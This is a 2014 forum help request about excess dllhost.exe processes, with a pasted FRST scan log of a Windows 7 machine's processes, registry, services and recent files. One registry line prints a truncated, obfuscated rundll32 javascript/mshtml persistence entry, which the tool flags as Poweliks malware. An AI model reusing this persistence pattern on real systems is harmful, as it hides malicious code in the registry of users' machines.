Too many DLLHOST.exe *32 running


  • This topic is locked
20 replies to this topic

#1 litepc

  • Members
  • 12 posts

Posted 01 September 2014 - 07:52 AM

Hi there:

All of a sudden I see too many dllhost.exe *32 running and I don't know why.

Can one please help me fix this problem? And also, any idea why this is happening?

Please note that I have ESET NOD32 version 6.0.316.0 running on my PC.

Thank you,

Emanuel

PS: I included the 2 FRST files here.

-------------------------------------------------------------------------------------

Scan result of Farbar Recovery Scan Tool (FRST.txt) (x64) Version: 31-08-2014 02
Ran by FD-2 (administrator) on SFTFD-2 on 01-09-2014 08:39:01
Running from C:\Users\FD-2\Downloads
Platform: Windows 7 Professional Service Pack 1 (X64) OS Language: English (United States)
Internet Explorer Version 9
Boot Mode: Normal

The only official download link for FRST:
Download link for 32-Bit version: http://www.bleepingcomputer.com/download/farbar-recovery-scan-tool/dl/81/
Download link for 64-Bit Version: http://www.bleepingcomputer.com/download/farbar-recovery-scan-tool/dl/82/
Download link from any site other than Bleeping Computer is unpermitted or outdated.
See tutorial for FRST: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

(Amadeus) C:\Program Files (x86)\Automatic Update\AutoUpdate.exe
(ESET) C:\Program Files\ESET\ESET NOD32 Antivirus\x86\ekrn.exe
(Citrix Online, a division of Citrix Systems, Inc.) C:\Program Files (x86)\Citrix\GoToAssist Remote Support Customer\715\g2ax_service.exe
() C:\ICVERIFY\ICWin420\PCVXWinServiceManager.exe
() C:\ICVERIFY\ICWin420\Jcard\JCardService.exe
(Microsoft Corporation) C:\Program Files (x86)\Common Files\microsoft shared\VS7DEBUG\mdm.exe
() C:\ICVERIFY\ICWin420\PCVXWinServiceManager.exe
(Intel Corporation) C:\Windows\System32\igfxtray.exe
(Intel Corporation) C:\Windows\System32\hkcmd.exe
(Intel Corporation) C:\Windows\System32\igfxpers.exe
(ESET) C:\Program Files\ESET\ESET NOD32 Antivirus\egui.exe
(Intuit Inc.) C:\Program Files (x86)\Intuit1\QuickBooks 2014\QBW32.EXE
(PFU LIMITED) C:\Program Files (x86)\PFU\ScanSnap\Driver\PfuSsMon.exe
(Citrix Online, a division of Citrix Systems, Inc.) C:\Program Files (x86)\Citrix\GoToAssist Remote Support Customer\715\g2ax_comm_customer.exe
(Citrix Online, a division of Citrix Systems, Inc.) C:\Program Files (x86)\Citrix\GoToAssist Remote Support Customer\715\g2ax_system_customer.exe
(Citrix Online, a division of Citrix Systems, Inc.) C:\Program Files (x86)\Citrix\GoToAssist Remote Support Customer\715\g2ax_user_customer.exe
(Microsoft Corporation) C:\Windows\System32\wiawow64.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Intuit) C:\Program Files (x86)\Common Files\Intuit\QuickBooks\QBCFMonitorService.exe
(Intuit Inc.) C:\Program Files (x86)\Common Files\Intuit\DataProtect\QBIDPService.exe
(Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE
(Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVCM.EXE
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Sun Microsystems, Inc.) C:\ICVERIFY\ICWin420\jre1.6.0\bin\javaw.exe
(ICVERIFY, Inc.) C:\ICVERIFY\ICWin420\ICVTnsServer.exe
(FirstData) C:\ICVERIFY\ICWin420\Firstdata.Security.PCVXFileMonitor.exe
(Microsoft Corporation) C:\Windows\SysWOW64\wbem\WmiPrvSE.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Citrix Online, a division of Citrix Systems, Inc.) C:\Program Files (x86)\Citrix\GoToAssist Remote Support Customer\715\g2ax_host_service.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Mozilla Corporation) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Farbar) C:\Users\FD-2\Downloads\FRST64(2).exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe


==================== Registry (Whitelisted) ==================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Run: [egui] => C:\Program Files\ESET\ESET NOD32 Antivirus\egui.exe [6330568 2013-03-21] (ESET)
HKLM-x32\...\Run: [BCSSync] => C:\Program Files (x86)\Microsoft Office\Office14\BCSSync.exe [89184 2012-11-05] (Microsoft Corporation)
Winlogon\Notify\GoToAssist Express Customer: C:\Program Files (x86)\Citrix\GoToAssist Remote Support Customer\715\g2ax_winlogonx64.dll (Citrix Online, a division of Citrix Systems, Inc.)
Winlogon\Notify\igfxcui: C:\Windows\system32\igfxdev.dll (Intel Corporation)
HKU\S-1-5-21-1305414874-3063939017-1416520829-1002\...\MountPoints2: {592239f5-783d-11e3-9df9-a41f727f797e} - E:\LG_PC_Programs.exe
HKU\S-1-5-21-1305414874-3063939017-1416520829-1002\...A8F59079A8D5}\localserver32: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 239 more characters). <==== Poweliks!
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Conversion to PDF with ScanSnap Organizer.lnk
ShortcutTarget: Conversion to PDF with ScanSnap Organizer.lnk -> C:\Program Files (x86)\PFU\ScanSnap\Organizer\PfuSsOrgOcrChk.exe (PFU LIMITED)
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Intuit Data Protect.lnk
ShortcutTarget: Intuit Data Protect.lnk -> C:\Program Files (x86)\Common Files\Intuit\DataProtect\IntuitDataProtect.exe (Intuit Inc.)
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\QuickBooks_Standard_21.lnk
ShortcutTarget: QuickBooks_Standard_21.lnk -> C:\Program Files (x86)\Intuit1\QuickBooks 2014\QBW32.EXE (Intuit Inc.)
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\ScanSnap Manager.lnk
ShortcutTarget: ScanSnap Manager.lnk -> C:\Program Files (x86)\PFU\ScanSnap\Driver\PfuSsMon.exe (PFU LIMITED)

==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = https://www.google.com/
StartMenuInternet: IEXPLORE.EXE - C:\Program Files (x86)\Internet Explorer\iexplore.exe
SearchScopes: HKCU - DefaultScope {3E55D4B1-86FD-4BD7-A10D-13927F39D929} URL = https://www.google.com/search?q={searchTerms}
SearchScopes: HKCU - {3E55D4B1-86FD-4BD7-A10D-13927F39D929} URL = https://www.google.com/search?q={searchTerms}
BHO: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll (Microsoft Corp.)
BHO: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files\Microsoft Office\Office14\URLREDIR.DLL (Microsoft Corporation)
BHO-x32: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll (Microsoft Corp.)
BHO-x32: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files (x86)\Microsoft Office\Office14\URLREDIR.DLL (Microsoft Corporation)
DPF: HKLM-x32 {02BCC737-B171-4746-94C9-0D8A0B2C0089} http://office.microsoft.com/_layouts/ClientBin/ieawsdc32.cab
DPF: HKLM-x32 {051FE707-9706-11D5-A836-000102A7C938} http://certificates.amadeusvista.com/sgwadmin/common/AutoUpdateATL43P100.CAB
DPF: HKLM-x32 {3839EEB1-774E-40AC-BB55-1FFF0F09FFBC} http://extranets.us.amadeus.com/techservices/documents/SoftwareDistribution/Amadeus-CS-MIA/AmadeusRailKeyAgent/v1003/install.cab
DPF: HKLM-x32 {5CCB8990-66EF-4466-B051-CD27FA3821DF} http://content.amadeus.com/Scripts/AmadeusNALibrary/V2.0.0/install.cab
DPF: HKLM-x32 {9D96A8C3-A6DA-47CC-BD44-A968B60C01EB} http://extranet.us.amadeus.com/techservices/documents/softwaredistribution/amadeus-cs-mia/FXG/v1.2.3/MasterPricerFXM.cab
DPF: HKLM-x32 {D27CDB6E-AE6D-11CF-96B8-444553540000} http://fpdownload2.macromedia.com/get/shockwave/cabs/flash/swflash.cab
DPF: HKLM-x32 {F96020DD-C373-44A0-82B6-064EF0AEEAE3} http://certificates.amadeusvista.com/sgwadmin/RegSiteTools.cab
Handler: intu-help-qb7 - {5A03BD9D-766D-47A6-8E87-CD90F60BE245} -  No File
Handler: qbwc - {FC598A64-626C-4447-85B8-53150405FD57} -  No File
Handler: tmpx - {0E526CB5-7446-41D1-A403-19BFE95E8C23} -  No File
Handler-x32: http\0x00000001 - {E1D2BF42-A96B-11d1-9C6B-0000F875AC61} - C:\Program Files (x86)\Common Files\SYSTEM\OLE DB\msdaipp.dll (Microsoft Corporation)
Handler-x32: http\oledb - {E1D2BF40-A96B-11d1-9C6B-0000F875AC61} - C:\Program Files (x86)\Common Files\SYSTEM\OLE DB\msdaipp.dll (Microsoft Corporation)
Handler-x32: https\0x00000001 - {E1D2BF42-A96B-11d1-9C6B-0000F875AC61} - C:\Program Files (x86)\Common Files\SYSTEM\OLE DB\msdaipp.dll (Microsoft Corporation)
Handler-x32: https\oledb - {E1D2BF40-A96B-11d1-9C6B-0000F875AC61} - C:\Program Files (x86)\Common Files\SYSTEM\OLE DB\msdaipp.dll (Microsoft Corporation)
Handler-x32: intu-help-qb7 - {5A03BD9D-766D-47A6-8E87-CD90F60BE245} - C:\Program Files (x86)\Intuit1\QuickBooks 2014\HelpAsyncPluggableProtocol.dll (Intuit, Inc.)
Handler-x32: msdaipp\0x00000001 - {E1D2BF42-A96B-11d1-9C6B-0000F875AC61} - C:\Program Files (x86)\Common Files\SYSTEM\OLE DB\msdaipp.dll (Microsoft Corporation)
Handler-x32: msdaipp\oledb - {E1D2BF40-A96B-11d1-9C6B-0000F875AC61} - C:\Program Files (x86)\Common Files\SYSTEM\OLE DB\msdaipp.dll (Microsoft Corporation)
Handler-x32: qbwc - {FC598A64-626C-4447-85B8-53150405FD57} - C:\Windows\SysWOW64\mscoree.dll (Microsoft Corporation)
Handler-x32: tmpx - {0E526CB5-7446-41D1-A403-19BFE95E8C23} -  No File
Tcpip\Parameters: [DhcpNameServer] 208.67.222.222 208.67.220.220 4.2.2.2

FireFox:
========
FF ProfilePath: C:\Users\FD-2\AppData\Roaming\Mozilla\Firefox\Profiles\31sv5obh.default
FF Homepage: hxxp://google.com/
FF Plugin: @microsoft.com/GENUINE -> disabled No File
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files\Microsoft Silverlight\5.1.30514.0\npctrl.dll ( Microsoft Corporation)
FF Plugin: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~1\MICROS~1\Office14\NPAUTHZ.DLL (Microsoft Corporation)
FF Plugin-x32: @foxitsoftware.com/Foxit Reader Plugin,version=1.0,application/pdf -> C:\PROGRAM FILES (X86)\FOXIT SOFTWARE\FOXIT READER\plugins\npFoxitReaderPlugin.dll (Foxit Corporation)
FF Plugin-x32: @foxitsoftware.com/Foxit Reader Plugin,version=1.0,application/vnd.fdf -> C:\PROGRAM FILES (X86)\FOXIT SOFTWARE\FOXIT READER\plugins\npFoxitReaderPlugin.dll (Foxit Corporation)
FF Plugin-x32: @microsoft.com/GENUINE -> disabled No File
FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files (x86)\Microsoft Silverlight\5.1.30514.0\npctrl.dll ( Microsoft Corporation)
FF Plugin-x32: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~2\MICROS~1\Office14\NPAUTHZ.DLL (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\PROGRA~2\MICROS~1\Office14\NPSPWRAP.DLL (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=15.4.3502.0922 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=15.4.3508.1109 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.24.15\npGoogleUpdate3.dll (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.24.15\npGoogleUpdate3.dll (Google Inc.)
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Reader 10.0\Reader\AIR\nppdf32.dll (Adobe Systems Inc.)
FF Plugin HKCU: @citrixonline.com/appdetectorplugin -> C:\Users\FD-2\AppData\Local\Citrix\Plugins\104\npappdetector.dll (Citrix Online)
FF HKLM\...\Thunderbird\Extensions: [eplgTb@eset.com] - C:\Program Files\ESET\ESET NOD32 Antivirus\Mozilla Thunderbird
FF Extension: ESET Smart Security Extension - C:\Program Files\ESET\ESET NOD32 Antivirus\Mozilla Thunderbird [2013-08-20]
FF HKLM-x32\...\Firefox\Extensions: [{22C7F6C6-8D67-4534-92B5-529A0EC09405}] - C:\Program Files (x86)\Trend Micro\Client Server Security Agent\bho\1009\FirefoxExtension
FF HKLM-x32\...\Thunderbird\Extensions: [eplgTb@eset.com] - C:\Program Files\ESET\ESET NOD32 Antivirus\Mozilla Thunderbird

Chrome:
=======
CHR Profile: C:\Users\FD-2\AppData\Local\Google\Chrome\User Data\Default
CHR Extension: (Google Docs) - C:\Users\FD-2\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2014-08-08]
CHR Extension: (Google Drive) - C:\Users\FD-2\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2014-08-08]
CHR Extension: (Google Voice Search Hotword (Beta)) - C:\Users\FD-2\AppData\Local\Google\Chrome\User Data\Default\Extensions\bepbmhgboaologfdajaanbcjmnhjmhfn [2014-07-25]
CHR Extension: (YouTube) - C:\Users\FD-2\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2014-08-08]
CHR Extension: (Google Search) - C:\Users\FD-2\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2014-08-08]
CHR Extension: (Google Wallet) - C:\Users\FD-2\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2014-07-25]
CHR Extension: (Gmail) - C:\Users\FD-2\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2014-08-08]
CHR Extension: (example) - C:\Users\FD-2\AppData\Roaming\2433510085 [2014-08-08]

==================== Services (Whitelisted) =================

(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)

R2 Amadeus Automatic Update; C:\Program Files (x86)\Automatic Update\AutoUpdate.exe [228192 2014-04-04] (Amadeus)
S2 CLKMSVC10_9EC60124; C:\Program Files (x86)\CyberLink\PowerDVD9\NavFilter\kmsvc.exe [248304 2011-08-11] (CyberLink)
R2 ekrn; C:\Program Files\ESET\ESET NOD32 Antivirus\x86\ekrn.exe [1341664 2013-03-21] (ESET)
R2 GoToAssist Remote Support Customer; C:\Program Files (x86)\Citrix\GoToAssist Remote Support Customer\715\g2ax_service.exe [610888 2014-07-31] (Citrix Online, a division of Citrix Systems, Inc.)
S3 icvmlt32; C:\ICVERIFY\ICWin420\PCVXWinServiceManager.exe [55152 2012-04-09] ()
R2 ICVTnsServer; C:\ICVERIFY\ICWin420\PCVXWinServiceManager.exe [55152 2012-04-09] ()
R2 JCard Service; C:\ICVERIFY\ICWin420\Jcard\JCardService.exe [149360 2012-04-09] ()
R2 MDM; C:\Program Files (x86)\Common Files\Microsoft Shared\VS7DEBUG\MDM.EXE [335872 2006-10-26] (Microsoft Corporation) [File not signed]
R2 PCVXFileMonitor; C:\ICVERIFY\ICWin420\PCVXWinServiceManager.exe [55152 2012-04-09] ()
R2 QBCFMonitorService; C:\Program Files (x86)\Common Files\Intuit\QuickBooks\QBCFMonitorService.exe [45056 2014-06-26] (Intuit) [File not signed]
S3 QBFCService; C:\Program Files (x86)\Common Files\Intuit\QuickBooks\FCS\Intuit.QuickBooks.FCS.exe [65536 2014-06-26] (Intuit Inc.) [File not signed]
R2 QBVSS; C:\Program Files (x86)\Common Files\Intuit\DataProtect\QBIDPService.exe [1248256 2014-06-26] (Intuit Inc.) [File not signed]

==================== Drivers (Whitelisted) ====================

(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)

R1 eamonm; C:\Windows\System32\DRIVERS\eamonm.sys [213416 2013-02-20] (ESET)
R1 ehdrv; C:\Windows\System32\DRIVERS\ehdrv.sys [150616 2013-01-10] (ESET)
R2 epfwwfpr; C:\Windows\System32\DRIVERS\epfwwfpr.sys [139768 2013-01-10] (ESET)
S3 EtronSTOR; C:\Windows\System32\Drivers\EtronSTOR.sys [32512 2012-06-13] (Etron Technology Inc)
R3 PaniniUSB; C:\Windows\System32\DRIVERS\PaniniUSB.sys [266752 2012-10-22] (Jungo)
R3 PaniniUSB; C:\Windows\SysWOW64\DRIVERS\PaniniUSB.sys [266752 2012-10-22] (Jungo)
S2 PMEM; C:\Windows\SysWOW64\drivers\pmemnt.sys [7168 1999-03-08] (Microsoft Corporation) [File not signed]
R0 PxHlpa64; C:\Windows\System32\Drivers\PxHlpa64.sys [56336 2012-08-10] (Corel Corporation)
S3 SNXPPAMD; C:\Windows\system32\drivers\snxppamd.sys [100728 2010-12-03] (SUNIX Co., Ltd.)
S3 SNXPSAMD; C:\Windows\system32\drivers\snxpsamd.sys [97144 2010-12-03] (SUNIX Co., Ltd.)

==================== NetSvcs (Whitelisted) ===================

(If an item is included in the fixlist, it will be removed from the registry. Any associated file could be listed separately to be moved.)


==================== One Month Created Files and Folders ========

(If an entry is included in the fixlist, the file\folder will be moved.)

2014-09-01 08:38 - 2014-09-01 08:38 - 02104832 _____ (Farbar) C:\Users\FD-2\Downloads\FRST64(2).exe
2014-09-01 02:13 - 2014-09-01 02:13 - 02104832 _____ (Farbar) C:\Users\FD-2\Downloads\FRST64(1).exe
2014-09-01 02:10 - 2014-09-01 02:11 - 05161948 _____ (ParetoLogic, Inc.) C:\Users\FD-2\Downloads\Repair-tool(1).exe.part
2014-09-01 02:09 - 2014-09-01 02:09 - 05162600 _____ (ParetoLogic, Inc.) C:\Users\FD-2\Downloads\Repair-tool.exe
2014-09-01 01:22 - 2014-09-01 01:20 - 03219456 _____ (VMware, Inc.) C:\Windows\SysWOW64\vm3dgl.dll
2014-09-01 01:22 - 2014-09-01 01:20 - 03219456 _____ (VMware, Inc.) C:\Windows\system32\vm3dgl.dll
2014-09-01 01:22 - 2014-09-01 01:20 - 00602112 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mstime.dll
2014-09-01 01:22 - 2014-09-01 01:20 - 00602112 _____ (Microsoft Corporation) C:\Windows\system32\mstime.dll
2014-09-01 01:22 - 2014-09-01 01:20 - 00217088 _____ (VMware, Inc.) C:\Windows\SysWOW64\vm3dum.dll
2014-09-01 01:22 - 2014-09-01 01:20 - 00217088 _____ (VMware, Inc.) C:\Windows\system32\vm3dum.dll
2014-09-01 01:22 - 2014-09-01 01:20 - 00061440 _____ (VMware, Inc.) C:\Windows\SysWOW64\vsocklib.dll
2014-09-01 01:22 - 2014-09-01 01:20 - 00061440 _____ (VMware, Inc.) C:\Windows\system32\vsocklib.dll
2014-09-01 01:22 - 2014-09-01 01:20 - 00053248 _____ (VMware, Inc.) C:\Windows\SysWOW64\vmGuestLib.dll
2014-09-01 01:22 - 2014-09-01 01:20 - 00053248 _____ (VMware, Inc.) C:\Windows\system32\vmGuestLib.dll
2014-09-01 01:22 - 2014-09-01 01:20 - 00049152 _____ (VMware, Inc.) C:\Windows\SysWOW64\vmhgfs.dll
2014-09-01 01:22 - 2014-09-01 01:20 - 00049152 _____ (VMware, Inc.) C:\Windows\system32\vmhgfs.dll
2014-09-01 01:22 - 2014-09-01 01:20 - 00032768 _____ (VMware, Inc.) C:\Windows\SysWOW64\vmGuestLibJava.dll
2014-09-01 01:22 - 2014-09-01 01:20 - 00032768 _____ (VMware, Inc.) C:\Windows\system32\vmGuestLibJava.dll
2014-09-01 01:22 - 2014-09-01 01:20 - 00016384 _____ () C:\Windows\SysWOW64\corpol.dll
2014-09-01 01:22 - 2014-09-01 01:20 - 00016384 _____ () C:\Windows\system32\corpol.dll
2014-09-01 01:07 - 2014-09-01 01:07 - 00001091 _____ () C:\Users\FD-2\Desktop\DllTool.lnk
2014-09-01 01:07 - 2014-09-01 01:07 - 00000000 ____D () C:\Users\FD-2\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\DllTool
2014-09-01 01:07 - 2014-09-01 01:07 - 00000000 ____D () C:\Users\FD-2\AppData\Roaming\KSafe
2014-09-01 01:07 - 2014-09-01 01:07 - 00000000 ____D () C:\ProgramData\KSafe
2014-09-01 01:06 - 2014-09-01 01:06 - 08473440 _____ ( ) C:\Users\FD-2\Downloads\DllTool.exe
2014-09-01 01:06 - 2014-09-01 01:06 - 00000000 ____D () C:\Program Files (x86)\DllTool
2014-09-01 00:57 - 2014-09-01 00:57 - 00037443 _____ () C:\Users\FD-2\Downloads\Addition.txt
2014-09-01 00:55 - 2014-09-01 08:39 - 00017658 _____ () C:\Users\FD-2\Downloads\FRST.txt
2014-09-01 00:55 - 2014-09-01 08:39 - 00000000 ____D () C:\FRST
2014-09-01 00:55 - 2014-09-01 00:55 - 02104832 _____ (Farbar) C:\Users\FD-2\Downloads\FRST64.exe
2014-08-27 23:55 - 2014-08-22 22:07 - 00404480 _____ (Microsoft Corporation) C:\Windows\system32\gdi32.dll
2014-08-27 23:55 - 2014-08-22 21:45 - 00311808 _____ (Microsoft Corporation) C:\Windows\SysWOW64\gdi32.dll
2014-08-27 23:55 - 2014-08-22 20:59 - 03163648 _____ (Microsoft Corporation) C:\Windows\system32\win32k.sys
2014-08-27 01:15 - 2014-08-27 01:15 - 00000000 ___HD () C:\ProgramData\{9A88E103-A20A-4EA5-8636-C73B709A5BF8}
2014-08-25 13:37 - 2014-08-25 13:38 - 00000000 ____D () C:\Program Files (x86)\Mozilla Firefox
2014-08-16 03:00 - 2014-06-30 18:24 - 00008856 _____ (Microsoft Corporation) C:\Windows\system32\icardres.dll
2014-08-16 03:00 - 2014-06-30 18:14 - 00008856 _____ (Microsoft Corporation) C:\Windows\SysWOW64\icardres.dll
2014-08-16 03:00 - 2014-06-06 02:16 - 00035480 _____ (Microsoft Corporation) C:\Windows\SysWOW64\TsWpfWrp.exe
2014-08-16 03:00 - 2014-06-06 02:12 - 00035480 _____ (Microsoft Corporation) C:\Windows\system32\TsWpfWrp.exe
2014-08-16 03:00 - 2014-03-09 17:48 - 01389208 _____ (Microsoft Corporation) C:\Windows\system32\icardagt.exe
2014-08-16 03:00 - 2014-03-09 17:48 - 00171160 _____ (Microsoft Corporation) C:\Windows\system32\infocardapi.dll
2014-08-16 03:00 - 2014-03-09 17:47 - 00619672 _____ (Microsoft Corporation) C:\Windows\SysWOW64\icardagt.exe
2014-08-16 03:00 - 2014-03-09 17:47 - 00099480 _____ (Microsoft Corporation) C:\Windows\SysWOW64\infocardapi.dll
2014-08-15 23:55 - 2014-08-06 22:06 - 00529920 _____ (Microsoft Corporation) C:\Windows\system32\aepdu.dll
2014-08-15 23:55 - 2014-08-06 22:01 - 00424448 _____ (Microsoft Corporation) C:\Windows\system32\aeinv.dll
2014-08-15 23:55 - 2014-07-24 15:28 - 17861120 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.dll
2014-08-15 23:55 - 2014-07-24 15:12 - 02339328 _____ (Microsoft Corporation) C:\Windows\system32\jscript9.dll
2014-08-15 23:55 - 2014-07-24 15:10 - 10920960 _____ (Microsoft Corporation) C:\Windows\system32\ieframe.dll
2014-08-15 23:55 - 2014-07-24 15:07 - 01384960 _____ (Microsoft Corporation) C:\Windows\system32\urlmon.dll
2014-08-15 23:55 - 2014-07-24 15:06 - 01392128 _____ (Microsoft Corporation) C:\Windows\system32\wininet.dll
2014-08-15 23:55 - 2014-07-24 15:05 - 01494016 _____ (Microsoft Corporation) C:\Windows\system32\inetcpl.cpl
2014-08-15 23:55 - 2014-07-24 15:05 - 00237056 _____ (Microsoft Corporation) C:\Windows\system32\url.dll
2014-08-15 23:55 - 2014-07-24 15:05 - 00086016 _____ (Microsoft Corporation) C:\Windows\system32\jsproxy.dll
2014-08-15 23:55 - 2014-07-24 15:04 - 02155520 _____ (Microsoft Corporation) C:\Windows\system32\iertutil.dll
2014-08-15 23:55 - 2014-07-24 15:04 - 00816640 _____ (Microsoft Corporation) C:\Windows\system32\jscript.dll
2014-08-15 23:55 - 2014-07-24 15:04 - 00729088 _____ (Microsoft Corporation) C:\Windows\system32\msfeeds.dll
2014-08-15 23:55 - 2014-07-24 15:04 - 00599040 _____ (Microsoft Corporation) C:\Windows\system32\vbscript.dll
2014-08-15 23:55 - 2014-07-24 15:04 - 00453120 _____ (Microsoft Corporation) C:\Windows\system32\dxtmsft.dll
2014-08-15 23:55 - 2014-07-24 15:04 - 00173056 _____ (Microsoft Corporation) C:\Windows\system32\ieUnatt.exe
2014-08-15 23:55 - 2014-07-24 15:03 - 02382848 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.tlb
2014-08-15 23:55 - 2014-07-24 15:03 - 00282112 _____ (Microsoft Corporation) C:\Windows\system32\dxtrans.dll
2014-08-15 23:55 - 2014-07-24 15:03 - 00096768 _____ (Microsoft Corporation) C:\Windows\system32\mshtmled.dll
2014-08-15 23:55 - 2014-07-24 15:03 - 00055296 _____ (Microsoft Corporation) C:\Windows\system32\msfeedsbs.dll
2014-08-15 23:55 - 2014-07-24 15:03 - 00012800 _____ (Microsoft Corporation) C:\Windows\system32\mshta.exe
2014-08-15 23:55 - 2014-07-24 15:03 - 00011264 _____ (Microsoft Corporation) C:\Windows\system32\msfeedssync.exe
2014-08-15 23:55 - 2014-07-24 15:02 - 00248320 _____ (Microsoft Corporation) C:\Windows\system32\ieui.dll
2014-08-15 23:55 - 2014-07-24 14:07 - 12356608 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.dll
2014-08-15 23:55 - 2014-07-24 13:58 - 01810432 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript9.dll
2014-08-15 23:55 - 2014-07-24 13:57 - 09739264 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieframe.dll
2014-08-15 23:55 - 2014-07-24 13:52 - 01137664 _____ (Microsoft Corporation) C:\Windows\SysWOW64\urlmon.dll
2014-08-15 23:55 - 2014-07-24 13:51 - 01427968 _____ (Microsoft Corporation) C:\Windows\SysWOW64\inetcpl.cpl
2014-08-15 23:55 - 2014-07-24 13:51 - 01129472 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wininet.dll
2014-08-15 23:55 - 2014-07-24 13:50 - 00231936 _____ (Microsoft Corporation) C:\Windows\SysWOW64\url.dll
2014-08-15 23:55 - 2014-07-24 13:50 - 00065536 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jsproxy.dll
2014-08-15 23:55 - 2014-07-24 13:49 - 01802240 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iertutil.dll
2014-08-15 23:55 - 2014-07-24 13:49 - 00717824 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript.dll
2014-08-15 23:55 - 2014-07-24 13:49 - 00607744 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msfeeds.dll
